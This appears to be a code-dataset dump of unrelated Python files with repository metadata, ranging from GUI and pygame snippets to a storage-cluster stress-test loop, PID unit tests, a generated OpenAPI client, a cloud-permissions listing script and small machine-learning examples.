dpg.set_viewport_resizable(value=False)
# dpg.set_item_theme(primary_window, theme_id)
# dpg.set_item_theme(file_dialog, theme_id)
screen = None
for m in get_monitors():
screen = m
dpg.setup_dearpygui(viewport=vp)
dpg.show_viewport(vp)
dpg.start_dearpygui()
# https://www.youtube.com/watch?v=5mm_gdnOxpU
| [
"rnubla@gmail.com"
] | rnubla@gmail.com |
cb70d5fe1db0f0732fbacf5597c7d99fed39b7c6 | 3d8afceef40458704efbfd10565ce3e2f6cd0662 | /objects.py | 27ead85035a6fa530b51cc97dc603bcfa4b1eb11 | [] | no_license | PyKonstantine/Cyber-Eng | 02d9c5e001f0d0e935627c8a7dca643198cd2d82 | 4c78854998641e7d77382d6e35e86942ba7d983b | refs/heads/master | 2023-03-10T08:17:26.621204 | 2021-01-31T19:53:28 | 2021-01-31T19:53:28 | 334,460,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,400 | py | import pygame as pg
from settings import HEIGHT
COLOR_INACTIVE = pg.Color('lightskyblue3')
COLOR_ACTIVE = pg.Color('dodgerblue2')
class LiteControlButton:
def __init__(self, x, y, w, h):
self.rect = pg.Rect(x, y, w, h)
self.R = 0
self.G = 255
self.B = 0
self.button_y = 20
self.x = x
self.y = y
self.color = COLOR_INACTIVE
self.active = False
self.aria = pg.Surface((w, h))
def handle_event(self, event):
if event.type == pg.MOUSEBUTTONDOWN:
if self.rect.collidepoint(event.pos):
self.active = not self.active
self.color = COLOR_ACTIVE
self.button_y = event.pos[-1] + (self.y - HEIGHT)
self.R = self.button_y
self.G = 225 - self.R
print(self.button_y)
print(self.G, self.R)
else:
self.active = False
self.color = COLOR_INACTIVE
print('inactive')
def draw(self, screen):
self.aria.fill((self.get_lite_value()))
pg.draw.rect(screen, self.color, self.rect, 5)
pg.draw.circle(self.aria, (self.R, self.G, self.B), (self.rect.w // 2, self.button_y), (self.rect.w // 2), 20)
screen.blit(self.aria, (self.x, self.y))
def get_lite_value(self):
return self.G, self.G, self.G
| [
"chai.ne.voron1991@gmail.com"
] | chai.ne.voron1991@gmail.com |
76e4e94088cac8fe23976295b68806f853d5a0ef | cc8b87bef3cb2d93928d7882c1aa2cb6d29bd819 | /Python/cali_usa.py | 81f2f8cd3bcd4b918b3200fd8d66dde07995edb4 | [] | no_license | angelicaba23/MisionTic2022 | e61cf66ebe069d1b72995ebc466d85224486ad1c | e547343dd7f7dcbaf49958a99f0722f53c4df3a3 | refs/heads/master | 2023-08-01T03:42:36.252984 | 2021-09-17T02:29:06 | 2021-09-17T02:29:06 | 379,116,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,227 | py | """
------------MinTic-----------------
-------------UPB-------------------
-------Angélica Barranco-----------
"""
#factura
num_factura = 0
menu = "si"
while menu == "si":
print("\nBienvenido al sistema de calificacion")
nota_a = 0
nota_b = 0
nota_c = 0
nota_d = 0
nota_f = 0
c_f = 0
c_d = 0
c_c = 0
c_b = 0
c_a = 0
menu2= "si"
curso = input("\nIngrese el curso: ")
estudiante = int(input("\nIngrese el numero de estudiantes: "))
for i in range(estudiante):
grado = 200
while grado not in range(101):
grado = int(input(f"\nIngrese la calificacion en grado numerico [0-100] del estudiante {i+1}: "))
else:
pass
if grado < 60:
letra = "F"
nota_f = nota_f + grado
c_f = c_f+ 1
elif 60 <= grado < 70:
letra = "D"
nota_d+= grado
c_d += 1
elif 70 <= grado < 80:
letra = "C"
nota_c += grado
c_c += 1
elif 80 <= grado < 90:
letra = "B"
nota_b += grado
c_b += 1
elif grado >= 90:
letra = "A"
nota_a += grado
c_a += 1
else:
letra=""
print(f"\n\tEstudiante {i+1} : {letra}")
if c_f != 0:
promedio_f = nota_f / c_f
else:
promedio_f = 0
if c_d != 0:
promedio_d = nota_d / c_d
else:
promedio_d = 0
if c_c != 0:
promedio_c = nota_c / c_c
else:
promedio_c = 0
if c_b != 0:
promedio_b = nota_b / c_b
else:
promedio_b = 0
if c_a != 0:
promedio_a = nota_a / c_a
else:
promedio_a = 0
promedio = (nota_f+nota_a+nota_b+nota_c+nota_d)/estudiante
print(f"\n\t--------- CURSO {curso} ----------")
print(f"\n\t\t\t\t PROMEDIO")
print(f"\n\t A \t\t\t {promedio_a}")
print(f"\n\t B \t\t\t {promedio_b}")
print(f"\n\t C \t\t\t {promedio_c}")
print(f"\n\t D \t\t\t {promedio_d}")
print(f"\n\t F \t\t\t {promedio_f}")
print(f"\n\t CURSO \t\t\t {promedio}")
menu = input("\n Desea agregar notas de un nuevo curso? si/no: ") | [
"angelicaba9923@gmail.com"
] | angelicaba9923@gmail.com |
eebdc0052426934db29e5ef417df31c842b4617d | 1d3450789ee37cceaacddf1cce7508277fd8c240 | /testcli.py | abba3396419e79a83b015cb7665c14970d4e89f5 | [] | no_license | Grissess/nom | cf26ebc3b9c2b891ed021be6206571e78235b6c6 | affbd99fc6dad411f5442de72299689677670132 | refs/heads/master | 2020-04-08T13:18:12.096791 | 2015-01-26T10:33:04 | 2015-01-26T10:33:04 | 23,888,844 | 0 | 0 | null | 2014-09-11T00:42:27 | 2014-09-10T19:27:10 | Python | UTF-8 | Python | false | false | 122 | py | import service
srv=service.Service(('', 12075))
srv.start()
cli=srv.Connect(('127.0.0.1', 12074))
rx=srv.Resolve(cli, 'X') | [
"grissess@nexusg.org"
] | grissess@nexusg.org |
fa3f7ccbf4b282e0ed863b3a8fc5815164a62dd5 | 48bba3541896587cd96112ff4a814d5d8ec6414c | /codes/infer_video1.py | e01911f5f5ff92f0c6a5d5b8471da8590f406570 | [
"BSD-2-Clause"
] | permissive | Bala93/Digital-pathology | f056ebb42c7592fdca400ee0e832fb5225b91085 | 6be5f8a75d9ace9035e915b02244cf97af25ec96 | refs/heads/master | 2021-09-19T10:23:54.459477 | 2018-07-26T18:18:45 | 2018-07-26T18:18:45 | 102,435,574 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | /media/htic/NewVolume1/murali/Object_detection/models/research/infer_video1.py | [
"balamuralim.1993@gmail.com"
] | balamuralim.1993@gmail.com |
eba383154f45d3e7af31022c4c2cb7368e4e1f19 | 75e03232591b263a50523d7cfef4041db36caf01 | /VMWsolutions/at2-vclient-032/cft/stress_random_loop.py | 9838ee1acd308fedd0e76ae9218942c2a0100af3 | [] | no_license | adamkittel/src | aaf157062d069998a8d18841895e7362cf868ff9 | 11e3927bd990b885eba595346694de2d2601d5c9 | refs/heads/master | 2021-01-11T16:13:14.592894 | 2017-01-25T18:29:09 | 2017-01-25T18:29:09 | 80,040,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,389 | py | """
This action will run random stress tests in a loop
When run as a script, the following options/env variables apply:
--mvip The managementVIP of the cluster
SFMVIP env var
--user The cluster admin username
SFUSER env var
--pass The cluster admin password
SFPASS env var
--emailTo List of addresses to send email to
--iterations how many times to loop over the stress tests, 0=forever
"""
import sys
import time
from optparse import OptionParser
import lib.libsf as libsf
from lib.libsf import mylog
import logging
import lib.sfdefaults as sfdefaults
from lib.action_base import ActionBase
import send_email
import random
import stress_netbounce_sequential
import stress_nodefail_sequential
import stress_reboot_master
import stress_reboot_random
import stress_reboot_sequential
import stress_volume_rebalance
import get_active_nodes
class StressRandomLoopAction(ActionBase):
class Events:
"""
Events that this action defines
"""
FAILURE = "FAILURE"
def __init__(self):
super(self.__class__, self).__init__(self.__class__.Events)
def ValidateArgs(self, args):
libsf.ValidateArgs({"mvip" : libsf.IsValidIpv4Address,
"username" : None,
"password" : None,
"iterationCount" : libsf.IsInteger,
"emailTo" : None},
args)
def Execute(self, mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, iterationCount=100, emailTo=None, debug=False):
self.ValidateArgs(locals())
if debug:
mylog.console.setLevel(logging.DEBUG)
if iterationCount == 0:
mylog.warning("Looping Forever")
count = 10
else:
count = iterationCount
stress_test = ["stress_netbounce_sequential", "stress_nodefail_sequential", "stress_reboot_master", "stress_reboot_random", "stress_reboot_sequential", "stress_volume_rebalance"]
nodes_list = get_active_nodes.Get(mvip=mvip, username=username, password=password)
if nodes_list == False:
mylog.error("Could not get the list of active nodes")
return False
start_time = time.time()
for i in xrange(0, count):
random_index = random.randint(0, len(stress_test) - 1)
random_iteration = random.randint(1,10)
if iterationCount == 0:
mylog.banner("Starting " + stress_test[random_index].replace("_", " ").title() + " on " + mvip + " with " + str(random_iteration) + " iterations" + "\nIteration " + str(i) + " of infinity")
else:
mylog.banner("Starting " + stress_test[random_index].replace("_", " ").title() + " on " + mvip + " with " + str(random_iteration) + " iterations" + "\nIteration " + str(i) + " of " + str(iterationCount))
try:
if stress_test[random_index] == "stress_netbounce_sequential":
stress_netbounce_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
#mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
if stress_test[random_index] == "stress_nodefail_sequential":
if len(nodes_list) <=3:
mylog.banner("Skipping Stress Nodefail Sequential because there are not enough nodes")
else:
stress_nodefail_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
#mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
elif stress_test[random_index] == "stress_reboot_master":
stress_reboot_master.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
#mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
elif stress_test[random_index] == "stress_reboot_random":
stress_reboot_random.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
#mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
elif stress_test[random_index] == "stress_reboot_sequential":
stress_reboot_sequential.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
#mvip=sfdefaults.mvip, username=sfdefaults.username, password=sfdefaults.password, emailTo=None, iteration=1
elif stress_test[random_index] == "stress_volume_rebalance":
stress_volume_rebalance.Execute(mvip=mvip, username=username, password=password, iteration=random_iteration, emailTo=emailTo)
except Exception as e:
mylog.error("Could not preform " + stress_test[random_index].replace("_", " ").title())
send_email.Execute(emailTo=emailTo, emailSubject="Test " + stress_test[random_index].replace("_", " ").title() + " failed", emailBody=str(e))
mylog.step("Waiting 2 minutes")
time.sleep(120)
#if loopfoever then increase iterationCount by 1 each time so we never end the for loop
if iterationCount == 0:
count += 1
end_time = time.time()
delta_time = libsf.SecondsToElapsedStr(end_time - start_time)
ave_time_per_iteration = (end_time - start_time) / (i + 1)
ave_time_per_iteration = libsf.SecondsToElapsedStr(ave_time_per_iteration)
mylog.info("\tTotal Time: " + delta_time)
mylog.info("\tNumber of Iterations: " + str(i + 1))
mylog.info("\tAverage Time Per Iteration: " + ave_time_per_iteration)
emailBody = "The stress tests ran for " + delta_time + "\nTotal Iterations " + str(i + 1) + "\nAverage Time Per Iteration " + ave_time_per_iteration
send_email.Execute(emailTo=emailTo, emailSubject="The Testing Finished", emailBody=emailBody)
mylog.passed("Passed " + str(iterationCount) + " iterations of random stress testing")
return True
# Instantate the class and add its attributes to the module
# This allows it to be executed simply as module_name.Execute
libsf.PopulateActionModule(sys.modules[__name__])
if __name__ == '__main__':
mylog.debug("Starting " + str(sys.argv))
# Parse command line arguments
parser = OptionParser(option_class=libsf.ListOption, description=libsf.GetFirstLine(sys.modules[__name__].__doc__))
parser.add_option("-m", "--mvip", type="string", dest="mvip", default=sfdefaults.mvip, help="the management IP of the cluster")
parser.add_option("-u", "--user", type="string", dest="username", default=sfdefaults.username, help="the admin account for the cluster")
parser.add_option("-p", "--pass", type="string", dest="password", default=sfdefaults.password, help="the admin password for the cluster")
parser.add_option("--iterations", type="int", dest="iterations", default=100, help="How many iterations to loop over. 0 = Forever")
parser.add_option("--email_to", type="string", dest="email_to", default=None, help="The email account to send the results / updates to")
parser.add_option("--debug", action="store_true", dest="debug", default=False, help="display more verbose messages")
(options, extra_args) = parser.parse_args()
try:
timer = libsf.ScriptTimer()
if Execute(options.mvip, options.username, options.password, options.iterations, options.email_to, options.debug):
sys.exit(0)
else:
sys.exit(1)
except libsf.SfArgumentError as e:
mylog.error("Invalid arguments - \n" + str(e))
sys.exit(1)
except SystemExit:
raise
except KeyboardInterrupt:
mylog.warning("Aborted by user")
Abort()
exit(1)
except:
mylog.exception("Unhandled exception")
exit(1)
exit(0)
| [
"adam.kittel@solidfire.com"
] | adam.kittel@solidfire.com |
f1a2454b34e5977852b4f29981527465145cb558 | c86c07584e618c5a4936b13768ef417a319d4b06 | /show_user_permissions.py | 58928ceed0f506d981b1709985ce96329146f53c | [] | no_license | DivvyCloud/tools | 24c1404576e1d30625ae3be16b21c033c8e0bad2 | 53b3686b89e23fcfa44cd4fb95014929ee3cca27 | refs/heads/master | 2020-07-12T07:27:44.537320 | 2019-11-01T18:10:03 | 2019-11-01T18:10:03 | 204,754,278 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,059 | py | # Script to list all permissions a user has via groups and roles
##### SAMPLE OUTPUT
'''
[Alex-MBP scripts]$python show_user_permissions.py
User: ben.calpotura
Number of attached groups: 3
Roles for group: Marketing Team
[]
Roles for group: DivvySales
[ { 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'Testing role',
'global_scope': True,
'groups': ['divvyusergroup:39', 'divvyusergroup:45'],
'manage': True,
'name': 'Global View-Provision-Manage',
'provision': True,
'resource_group_scopes': [],
'resource_id': 'divvyrole:1:25',
'view': True},
{ 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'DivvyCloud Sales Team role',
'global_scope': True,
'groups': ['divvyusergroup:45'],
'manage': True,
'name': 'DivvySales',
'provision': True,
'resource_group_scopes': [],
'resource_id': 'divvyrole:1:34',
'view': True}]
Roles for group: Group Curation
[ { 'add_cloud': False,
'all_permissions': False,
'badge_scopes': [],
'cloud_scopes': [],
'delete': False,
'description': 'Curate into whitelist RG',
'global_scope': False,
'groups': ['divvyusergroup:52', 'divvyusergroup:64'],
'manage': True,
'name': 'Resource Group Curation',
'provision': False,
'resource_group_scopes': ['resourcegroup:64:'],
'resource_id': 'divvyrole:1:53',
'view': True}]
'''
import json
import requests
import getpass
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Username/password to authenticate against the API
username = ""
password = "" # Leave this blank if you don't want it in plaintext and it'll prompt you to input it when running the script.
# User in DivvyCloud
divvy_user = ""
# API URL
base_url = "https://sales-demo.divvycloud.com"
# Param validation
if not username:
username = input("Username: ")
if not password:
passwd = getpass.getpass('Password:')
else:
passwd = password
if not base_url:
base_url = input("Base URL (EX: http://localhost:8001 or http://45.59.252.4:8001): ")
if not divvy_user:
divvy_user = input("Username in DivvyCloud: ")
# Full URL
login_url = base_url + '/v2/public/user/login'
# Shorthand helper function
def get_auth_token():
response = requests.post(
url=login_url,
data=json.dumps({"username": username, "password": passwd}),
headers={
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json'
})
return response.json()['session_id']
auth_token = get_auth_token()
headers = {
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json',
'X-Auth-Token': auth_token
}
# Get User info
def get_users():
data = {}
response = requests.get(
url=base_url + '/v2/public/users/list',
data=json.dumps(data),
headers=headers
)
return response.json()
# Get User info
def get_group_info(user_id):
data = {}
response = requests.post(
url=base_url + '/v2/prototype/user/divvyuser:' + user_id + ':/groups/list',
data=json.dumps(data),
headers=headers
)
return response.json()
# Create the pack
user_list = get_users()
#print(user_list)
for user_info in user_list['users']:
username = user_info['username']
if username == divvy_user:
# List group info for the user
group_info = get_group_info(str(user_info['user_id']))
print("User: " + username)
print("Number of attached groups: " + str(len(group_info['groups'])))
for group in group_info['groups']:
print("Roles for group: " + group['name'])
#print(group['roles'])
pp.pprint(group['roles'])
| [
"alex.corstorphine@divvycloud.com"
] | alex.corstorphine@divvycloud.com |
91956ba4d19b41720a01993ac3acbd491ad295d4 | cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc | /Python Books/PythonTesting-BeginnersGuide/code/tests/test_chapter5/test_pid.py | 72b93cd1bcd67c97b5266912ef867908e2d9e800 | [] | no_license | theGreenJedi/Path | df24fca355590efef0c6cb5c52e7216c6b5d2464 | b5ed2805dbb046480929e49e550bfd8af5bb4d6f | refs/heads/master | 2023-07-27T14:23:37.694546 | 2021-07-16T01:38:55 | 2021-07-16T01:38:55 | 87,686,563 | 8 | 2 | null | 2023-07-11T22:49:03 | 2017-04-09T05:57:30 | Jupyter Notebook | UTF-8 | Python | false | false | 2,718 | py | from unittest import TestCase, main
from mocker import Mocker
import pid
class test_pid_constructor(TestCase):
def test_without_when(self):
mocker = Mocker()
mock_time = mocker.replace('time.time')
mock_time()
mocker.result(1.0)
mocker.replay()
controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
setpoint = 0, initial = 12)
mocker.restore()
mocker.verify()
self.assertEqual(controller.gains, (0.5, 0.5, 0.5))
self.assertAlmostEqual(controller.setpoint[0], 0.0)
self.assertEqual(len(controller.setpoint), 1)
self.assertAlmostEqual(controller.previous_time, 1.0)
self.assertAlmostEqual(controller.previous_error, -12.0)
self.assertAlmostEqual(controller.integrated_error, 0)
def test_with_when(self):
controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
setpoint = 1, initial = 12,
when = 43)
self.assertEqual(controller.gains, (0.5, 0.5, 0.5))
self.assertAlmostEqual(controller.setpoint[0], 1.0)
self.assertEqual(len(controller.setpoint), 1)
self.assertAlmostEqual(controller.previous_time, 43.0)
self.assertAlmostEqual(controller.previous_error, -11.0)
self.assertAlmostEqual(controller.integrated_error, 0)
class test_calculate_response(TestCase):
def test_without_when(self):
mocker = Mocker()
mock_time = mocker.replace('time.time')
mock_time()
mocker.result(1.0)
mock_time()
mocker.result(2.0)
mock_time()
mocker.result(3.0)
mock_time()
mocker.result(4.0)
mock_time()
mocker.result(5.0)
mocker.replay()
controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
setpoint = 0, initial = 12)
self.assertEqual(controller.calculate_response(6), -3)
self.assertEqual(controller.calculate_response(3), -4.5)
self.assertEqual(controller.calculate_response(-1.5), -0.75)
self.assertEqual(controller.calculate_response(-2.25), -1.125)
mocker.restore()
mocker.verify()
def test_with_when(self):
controller = pid.PID(P = 0.5, I = 0.5, D = 0.5,
setpoint = 0, initial = 12,
when = 1)
self.assertEqual(controller.calculate_response(6, 2), -3)
self.assertEqual(controller.calculate_response(3, 3), -4.5)
self.assertEqual(controller.calculate_response(-1.5, 4), -0.75)
self.assertEqual(controller.calculate_response(-2.25, 5), -1.125)
if __name__ == '__main__':
main()
| [
"GreenJedi@protonmail.com"
] | GreenJedi@protonmail.com |
76d1807da6e30de90b7fc8d7ae5c3f2be4b808a3 | c10f20abec372f81dbd6468ead208543f60940f1 | /learning/20.BayesianNetwork/20.1.Iris_GaussianNB.py | 8cd96f72d7add1efc07bd0c634a76cf4b1150c0f | [] | no_license | alenzhd/meachineLearning | 64876e7a6c0b8b39a63a9eb586d306a3489b4447 | 1b66ce2f73b226548f07e45c8537b8286635a048 | refs/heads/master | 2021-08-24T10:55:52.056439 | 2017-12-09T10:26:37 | 2017-12-09T10:26:37 | 112,688,163 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,854 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn.preprocessing import StandardScaler, MinMaxScaler, PolynomialFeatures
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
def iris_type(s):
it = {'Iris-setosa': 0, 'Iris-versicolor': 1, 'Iris-virginica': 2}
return it[s]
if __name__ == "__main__":
data = pd.read_csv('..\\8.Regression\\iris.data', header=None)
x, y = data[np.arange(4)], data[4]
y = pd.Categorical(values=y).codes
feature_names = u'花萼长度', u'花萼宽度', u'花瓣长度', u'花瓣宽度'
features = [0,1]
x = x[features]
x, x_test, y, y_test = train_test_split(x, y, train_size=0.7, random_state=0)
priors = np.array((1,2,4), dtype=float)
priors /= priors.sum()
gnb = Pipeline([
('sc', StandardScaler()),
('poly', PolynomialFeatures(degree=1)),
('clf', GaussianNB(priors=priors))]) # 由于鸢尾花数据是样本均衡的,其实不需要设置先验值
# gnb = KNeighborsClassifier(n_neighbors=3).fit(x, y.ravel())
gnb.fit(x, y.ravel())
y_hat = gnb.predict(x)
print ('训练集准确度: %.2f%%' % (100 * accuracy_score(y, y_hat)))
y_test_hat = gnb.predict(x_test)
print ('测试集准确度:%.2f%%' % (100 * accuracy_score(y_test, y_test_hat))) # 画图
N, M = 500, 500 # 横纵各采样多少个值
x1_min, x2_min = x.min()
x1_max, x2_max = x.max()
t1 = np.linspace(x1_min, x1_max, N)
t2 = np.linspace(x2_min, x2_max, M)
x1, x2 = np.meshgrid(t1, t2) # 生成网格采样点
x_grid = np.stack((x1.flat, x2.flat), axis=1) # 测试点
mpl.rcParams['font.sans-serif'] = [u'simHei']
mpl.rcParams['axes.unicode_minus'] = False
cm_light = mpl.colors.ListedColormap(['#77E0A0', '#FF8080', '#A0A0FF'])
cm_dark = mpl.colors.ListedColormap(['g', 'r', 'b'])
y_grid_hat = gnb.predict(x_grid) # 预测值
y_grid_hat = y_grid_hat.reshape(x1.shape)
plt.figure(facecolor='w')
plt.pcolormesh(x1, x2, y_grid_hat, cmap=cm_light) # 预测值的显示
plt.scatter(x[features[0]], x[features[1]], c=y, edgecolors='k', s=50, cmap=cm_dark)
plt.scatter(x_test[features[0]], x_test[features[1]], c=y_test, marker='^', edgecolors='k', s=120, cmap=cm_dark)
plt.xlabel(feature_names[features[0]], fontsize=13)
plt.ylabel(feature_names[features[1]], fontsize=13)
plt.xlim(x1_min, x1_max)
plt.ylim(x2_min, x2_max)
plt.title(u'GaussianNB对鸢尾花数据的分类结果', fontsize=18)
plt.grid(True)
plt.show()
| [
"zhanghd@asiainfo-mixdata.com"
] | zhanghd@asiainfo-mixdata.com |
20c0f10f618f37ebff15f67061d06d10a35ab6ef | 59dd90d261756b0de462b693d596f5f06f71270b | /samples/openapi3/client/petstore/python-experimental/petstore_api/api/fake_api_endpoints/group_parameters.py | bab146a1f469249eb19f39009467267a361a1734 | [
"Apache-2.0"
] | permissive | wsalembi/openapi-generator | cf76c5241e28956fc44a073d17a1ee14fd9aef85 | 035736f5c413bbdc8e70f840cc2e8ff32da9a5a8 | refs/heads/master | 2023-03-17T02:22:04.106748 | 2022-02-16T07:33:23 | 2022-02-16T07:33:23 | 227,096,278 | 0 | 0 | Apache-2.0 | 2023-03-13T17:02:23 | 2019-12-10T10:56:56 | Java | UTF-8 | Python | false | false | 6,531 | py | # coding: utf-8
"""
Generated by: https://openapi-generator.tech
"""
from dataclasses import dataclass
import re # noqa: F401
import sys # noqa: F401
import typing
import urllib3
from urllib3._collections import HTTPHeaderDict
from petstore_api import api_client, exceptions
import decimal # noqa: F401
from datetime import date, datetime # noqa: F401
from frozendict import frozendict # noqa: F401
from petstore_api.schemas import ( # noqa: F401
AnyTypeSchema,
ComposedSchema,
DictSchema,
ListSchema,
StrSchema,
IntSchema,
Int32Schema,
Int64Schema,
Float32Schema,
Float64Schema,
NumberSchema,
DateSchema,
DateTimeSchema,
DecimalSchema,
BoolSchema,
BinarySchema,
NoneSchema,
none_type,
InstantiationMetadata,
Unset,
unset,
ComposedBase,
ListBase,
DictBase,
NoneBase,
StrBase,
IntBase,
Int32Base,
Int64Base,
Float32Base,
Float64Base,
NumberBase,
DateBase,
DateTimeBase,
BoolBase,
BinaryBase,
Schema,
_SchemaValidator,
_SchemaTypeChecker,
_SchemaEnumMaker
)
# query params
RequiredStringGroupSchema = IntSchema
RequiredInt64GroupSchema = Int64Schema
StringGroupSchema = IntSchema
Int64GroupSchema = Int64Schema
RequestRequiredQueryParams = typing.TypedDict(
'RequestRequiredQueryParams',
{
'required_string_group': RequiredStringGroupSchema,
'required_int64_group': RequiredInt64GroupSchema,
}
)
RequestOptionalQueryParams = typing.TypedDict(
'RequestOptionalQueryParams',
{
'string_group': StringGroupSchema,
'int64_group': Int64GroupSchema,
},
total=False
)
class RequestQueryParams(RequestRequiredQueryParams, RequestOptionalQueryParams):
pass
request_query_required_string_group = api_client.QueryParameter(
name="required_string_group",
style=api_client.ParameterStyle.FORM,
schema=RequiredStringGroupSchema,
required=True,
explode=True,
)
request_query_required_int64_group = api_client.QueryParameter(
name="required_int64_group",
style=api_client.ParameterStyle.FORM,
schema=RequiredInt64GroupSchema,
required=True,
explode=True,
)
request_query_string_group = api_client.QueryParameter(
name="string_group",
style=api_client.ParameterStyle.FORM,
schema=StringGroupSchema,
explode=True,
)
request_query_int64_group = api_client.QueryParameter(
name="int64_group",
style=api_client.ParameterStyle.FORM,
schema=Int64GroupSchema,
explode=True,
)
# header params
RequiredBooleanGroupSchema = BoolSchema
BooleanGroupSchema = BoolSchema
RequestRequiredHeaderParams = typing.TypedDict(
'RequestRequiredHeaderParams',
{
'required_boolean_group': RequiredBooleanGroupSchema,
}
)
RequestOptionalHeaderParams = typing.TypedDict(
'RequestOptionalHeaderParams',
{
'boolean_group': BooleanGroupSchema,
},
total=False
)
class RequestHeaderParams(RequestRequiredHeaderParams, RequestOptionalHeaderParams):
pass
request_header_required_boolean_group = api_client.HeaderParameter(
name="required_boolean_group",
style=api_client.ParameterStyle.SIMPLE,
schema=RequiredBooleanGroupSchema,
required=True,
)
request_header_boolean_group = api_client.HeaderParameter(
name="boolean_group",
style=api_client.ParameterStyle.SIMPLE,
schema=BooleanGroupSchema,
)
_path = '/fake'
_method = 'DELETE'
_auth = [
'bearer_test',
]
@dataclass
class ApiResponseFor400(api_client.ApiResponse):
response: urllib3.HTTPResponse
body: Unset = unset
headers: Unset = unset
_response_for_400 = api_client.OpenApiResponse(
response_cls=ApiResponseFor400,
)
_status_code_to_response = {
'400': _response_for_400,
}
class GroupParameters(api_client.Api):
def group_parameters(
self: api_client.Api,
query_params: RequestQueryParams = frozendict(),
header_params: RequestHeaderParams = frozendict(),
stream: bool = False,
timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None,
skip_deserialization: bool = False,
) -> typing.Union[
api_client.ApiResponseWithoutDeserialization
]:
"""
Fake endpoint to test group parameters (optional)
:param skip_deserialization: If true then api_response.response will be set but
api_response.body and api_response.headers will not be deserialized into schema
class instances
"""
self._verify_typed_dict_inputs(RequestQueryParams, query_params)
self._verify_typed_dict_inputs(RequestHeaderParams, header_params)
_query_params = []
for parameter in (
request_query_required_string_group,
request_query_required_int64_group,
request_query_string_group,
request_query_int64_group,
):
parameter_data = query_params.get(parameter.name, unset)
if parameter_data is unset:
continue
serialized_data = parameter.serialize(parameter_data)
_query_params.extend(serialized_data)
_headers = HTTPHeaderDict()
for parameter in (
request_header_required_boolean_group,
request_header_boolean_group,
):
parameter_data = header_params.get(parameter.name, unset)
if parameter_data is unset:
continue
serialized_data = parameter.serialize(parameter_data)
_headers.extend(serialized_data)
# TODO add cookie handling
response = self.api_client.call_api(
resource_path=_path,
method=_method,
query_params=tuple(_query_params),
headers=_headers,
auth_settings=_auth,
stream=stream,
timeout=timeout,
)
if skip_deserialization:
api_response = api_client.ApiResponseWithoutDeserialization(response=response)
else:
response_for_status = _status_code_to_response.get(str(response.status))
if response_for_status:
api_response = response_for_status.deserialize(response, self.api_client.configuration)
else:
api_response = api_client.ApiResponseWithoutDeserialization(response=response)
if not 200 <= response.status <= 299:
raise exceptions.ApiException(api_response=api_response)
return api_response
| [
"noreply@github.com"
] | noreply@github.com |
d6d93d1c2677289dd9d3a9dc675e7e0a2d8b2862 | 6d49e92a553de6bcf07a308e15985ad600fcc367 | /hyperparam_optim.py | 813616bd8d25969c1b46f9659ad9fee4303fedaa | [] | no_license | nurahmadi/Audio-Classification-Using-Deep-Learning | 3e17462a7b7dc8e1e4e2165f9d6f2d27d1aa05dd | ad2dc8db8f00b597659c5d39fc1cfe55b79cadab | refs/heads/master | 2022-08-20T09:34:02.802485 | 2020-05-25T21:25:55 | 2020-05-25T21:25:55 | 266,879,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,744 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 18 21:46:40 2020
@author: na5815
"""
import numpy as np
import os
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dropout, Dense
from tensorflow.keras.optimizers import RMSprop
import h5py
import pickle
import optuna
from optuna.integration import TFKerasPruningCallback
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d.axes3d import Axes3D
from plotting import customise_scatter, legend_idx, plot_legend
num_labels = 10
feature_dir = 'features'
result_dir = 'results'
feature = 'mfcc' #['mel','mfcc']
model_type = 'lstm' # ['cnn','lstm']
# Loading feature from training, validation, and testing sets
train_file = os.path.join(feature_dir,'mel_mfcc_train.h5')
print ("Loading feature from file: "+train_file)
with h5py.File(train_file,'r') as f:
x_train = f[feature+'_train'][()]
y_train = f['y_train'][()]
valid_file = os.path.join(feature_dir,'mel_mfcc_valid.h5')
print ("Loading feature from file: "+valid_file)
with h5py.File(valid_file,'r') as f:
x_valid = f[feature+'_valid'][()]
y_valid = f['y_valid'][()]
input_shape = (x_train.shape[1], x_train.shape[2])
def objective(trial):
# hyperparameter search space
units = trial.suggest_int("units", 25, 250)
dropout = trial.suggest_categorical("dropout", [0, 0.1, 0.2, 0.3, 0.4])
